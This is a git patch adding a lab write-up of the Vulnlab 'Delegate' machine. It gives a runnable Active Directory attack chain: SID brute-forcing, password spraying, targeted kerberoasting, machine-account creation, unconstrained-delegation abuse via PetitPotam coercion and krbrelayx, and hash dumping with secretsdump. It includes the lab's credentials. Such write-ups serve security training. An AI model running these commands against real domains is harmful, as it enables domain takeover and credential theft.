From df9eb61393d0b6b28274dc02c47a1ae6cdf5b4bd Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sun, 29 Oct 2023 16:48:18 +0500
Subject: [PATCH] Create Delegate.md
---
Vulnlab/Delegate.md | 177 ++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 177 insertions(+)
create mode 100644 Vulnlab/Delegate.md
diff --git a/Vulnlab/Delegate.md b/Vulnlab/Delegate.md
new file mode 100644
index 0000000..053189e
--- /dev/null
+++ b/Vulnlab/Delegate.md
@@ -0,0 +1,177 @@
+
+# Vulnlab - Delegate
+
+```bash
+Host is up (0.22s latency).
+Not shown: 65522 filtered tcp ports (no-response)
+PORT STATE SERVICE VERSION
+53/tcp open domain Simple DNS Plus
+88/tcp open kerberos-sec
+135/tcp open msrpc Microsoft Windows RPC
+139/tcp open tcpwrapped
+445/tcp open tcpwrapped
+464/tcp open tcpwrapped
+3389/tcp open tcpwrapped
+| ssl-cert: Subject: commonName=DC1.delegate.vl
+| Issuer: commonName=DC1.delegate.vl
+| Public Key type: rsa
+| Public Key bits: 2048
+| Signature Algorithm: sha256WithRSAEncryption
+| Not valid before: 2023-09-30T15:47:02
+| Not valid after: 2024-03-31T15:47:02
+| MD5: 3a340b861cd985281f509d995bef9f4a
+|_SHA-1: ccc740dd30a643bfc26e0b7f5d018da28d7e1630
+5985/tcp open
+9389/tcp open tcpwrapped
+47001/tcp open tcpwrapped
+49667/tcp open tcpwrapped
+49669/tcp open tcpwrapped
+49670/tcp open tcpwrapped
+49686/tcp open tcpwrapped
+49691/tcp open tcpwrapped
+```
+
+Enumerating smb with anonymous user doesn't show any intereting shares
+
+
+
+We can however enumerate domain users with `lookupsid` using a guest account by brute forcing SIDs
+
+```bash
+lookupsid.py guest@delegate.vl 10000
+```
+
+
+
+Having the domain users, we can check if there's any account having pre-authentication disabled which can lead to AS-REP roasting
+
+
+
+Checking the shares and accessing `SYSVOL` share, we can find `users.bat` file having a password
+
+
+
+
+
+Spraying this password on the users we have confirms that this password belongs `A.Briggs`
+
+
+
+Running `python-bloodhound` to enumerate the domain
+
+```bash
+python3 bloodhound.py -d 'delegate.vl' -u 'A.Briggs' -p 'P4ssw0rd1#123' -c all -ns 10.10.70.255
+```
+
+
+From bloodhound we can see `A.Briggs` has `GenericWrite` on `N.thompson`
+
+
+
+This can abuse either through `Shadow credentials` or associating a SPN to N.Thompson for `Targeted kerberoasting`, I tried with shadow credentials by editing `msDS-KeyCredentialLink` but due to PKINT notbeing supported by this DC it didn't worked
+
+
+Attempting to perfrom targeted kerberoasting
+
+```bash
+python3 /opt/targetedKerberoast/targetedKerberoast.py -u 'A.Briggs' -p 'P4ssw0rd1#123' --request-user N.Thompson -d 'delegate.vl'
+```
+
+
+Cracking the hash with hashcat
+
+
+
+
+
+Since n.thompson has `CanPSRemote` we can login through WinRM
+
+
+
+This user belongs to `Delegation Admins` but there wasn't ACLs on bloodhound for that group
+
+
+
+Checking privileges of this user shows that it has `SeEnableDelegationPrivilege` enabled
+
+
+
+This means that we can abuse unconstrained delegation by creating machine account and append a SPN to it, before that we need to make sure if machine quota isn't 0
+
+
+First creating a machine account with `addcomputer.py`
+
+```bash
+addcomputer.py -dc-ip 10.10.70.255 -computer-pass TestPassword321 -computer-name UwU delegate.vl/N.Thompson:'KALEB_2341'
+```
+
+
+
+Adding dns record for the machine account we created
+
+```bash
+python3 dnstool.py -u 'delegate.vl\UwU$' -p TestPassword321 -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.70.255
+```
+
+
+
+Adding a DNS entry for this machine account with `dnstool`
+
+```
+python3 dnstool.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -r UwU.delegate.vl -d 10.8.0.136 --action add DC1.delegate.vl -dns-ip 10.10.85.247
+```
+
+
+
+To abuse unconstrained delegation the machine needs to have a SPN and `TRUSTED_FOR_DELEGATION` UAC, using `bloodyAD` we can add the UAC
+
+```bash
+python3 /opt/bloodyAD/bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'UwU$' -f TRUSTED_FOR_DELEGATION
+```
+
+
+
+Appending SPN with `addspn` via `msDS-AdditionalDnsHostName`
+
+```bash
+python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl --additional
+
+python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/UwU.delegate.vl' -t 'UwU$' -dc-ip 10.10.85.247 DC1.delegate.vl
+```
+
+
+
+Now running `krbrelayx` by first coercing authentication (using any poc i.e petipotam, printerbug, dfscoerce ) from DC1 to our added machine with unconstrained delegation enabled, this will grab the copy of DC1's TGT which gets stored in the memory of machine account having trusted for delegation enabled for the purpose of accessing resources
+
+```bash
+python3 PetitPotam.py -u 'UwU$' -p 'TestPassword321' UwU.delegate.vl 10.10.85.247
+```
+
+
+And running krbrelayx with NThash of the machine account
+
+```bash
+python3 ./krbrelayx.py -hashes :C7BE3644A2EB37C9BB1F248E9E0B9AFC
+```
+
+
+
+Having the ticket, we can export it and dump the hashes with `secretsdump`
+
+
+
+```bash
+secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass
+```
+
+
+
+
+
+# References
+
+- https://www.thehacker.recipes/a-d/movement/dacl/targeted-kerberoasting
+- https://exploit.ph/user-constrained-delegation.html
+- https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/
+- https://github.com/CravateRouge/bloodyAD
+- https://medium.com/r3d-buck3t/attacking-kerberos-unconstrained-delegation-ef77e1fb7203